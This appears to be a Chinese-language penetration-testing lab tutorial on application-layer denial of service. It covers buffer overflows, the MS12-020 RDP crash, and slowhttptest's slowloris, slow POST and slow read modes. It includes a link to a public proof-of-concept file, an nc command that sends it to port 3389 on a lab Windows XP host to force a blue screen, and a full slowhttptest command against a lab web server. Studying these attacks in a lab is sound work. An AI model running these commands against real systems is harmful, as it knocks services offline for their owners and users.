二十八、拒绝服务--(8)应用层DoS

1、应用服务漏洞

• 服务代码存在漏洞，遇异常提交数据时程序崩溃
• 应用处理大量并发请求能力有限，被拒绝的是应用或OS

2、缓冲区溢出漏洞

• 向目标函数随机提交数据，特定情况下数据覆盖临近寄存器或内存
• 影响：远程代码执行、DoS
• 利用模糊测试方法发现缓冲区溢出漏洞

3、测试 MS12-020远程桌面协议DOS漏洞

kali搜索

在18606.txt中查看其说明， http://aluigi.altervista.org/poc/termdd_1.dat在此路径下，下载文件，然后按照说明执行
windows xp开启3389端口，然后执行 nc 192.168.50.185 3389 < termdd_1.dat进行多次测试

开启3389

开始执行

导致蓝屏后重启

重启

4、slowhttptest（源自google）

• 低带宽应用层慢速DoS攻击（相对于CC等快速攻击而言的慢速）
• 最早由Python编写，跨平台支持（linux、win、cygwin、osx）
• 尤其擅长攻击apache、tomcat，对windows的IIS几乎无效
• 大量应用服务器和安全设备都无法防护慢速攻击
  攻击方法
• 耗尽应用的并发连接池，类似于http层的synflood
• http协议默认在服务器全部接收请求之后才开始处理，若客户端发送速度缓慢或不完整，服务器时钟为其保留连接资源池占用，此类大量并发将导致Dos
• slowloris：完整的http请求结尾\r\n\r\n（正常情况下），攻击方\r\n（攻击情况下，只发送一个\r\n，服务端一直等待）
• slow post：http头content-length声明长度，但body部分缓慢发送
• slow read attack攻击：与slowloris and slow post目的相同；不同之处在于请求正常发送，但慢速读取响应数据；攻击者调整TCP window窗口大小，是服务器慢速返回数据
• Apache range header attack：客户端传输大文件时，体积超过http body大小限制时进行分段；耗尽服务器CPU、内存资源

5、slowhttptest测试

输入# man slowhttptest，可以看到四种模式

slowhttptest

模式参数

# slowhttptest -c 10000 -H -g -o my_header_stats -i 10 -r 1 -t GET -u http://192.168.50.183 -x 24 -p 3 -l 9999999

攻击过程中

应用服务为不可用

服务不可用

6、其他拒绝服务

• 使用垃圾邮件塞满邮箱
• 无意识的/非故意的拒绝服务攻击
  • 数据库服务器宕机恢复后，引用队列大量请求洪水涌来
  • 告警邮件在邮件服务器修改地址后洪水攻击防火墙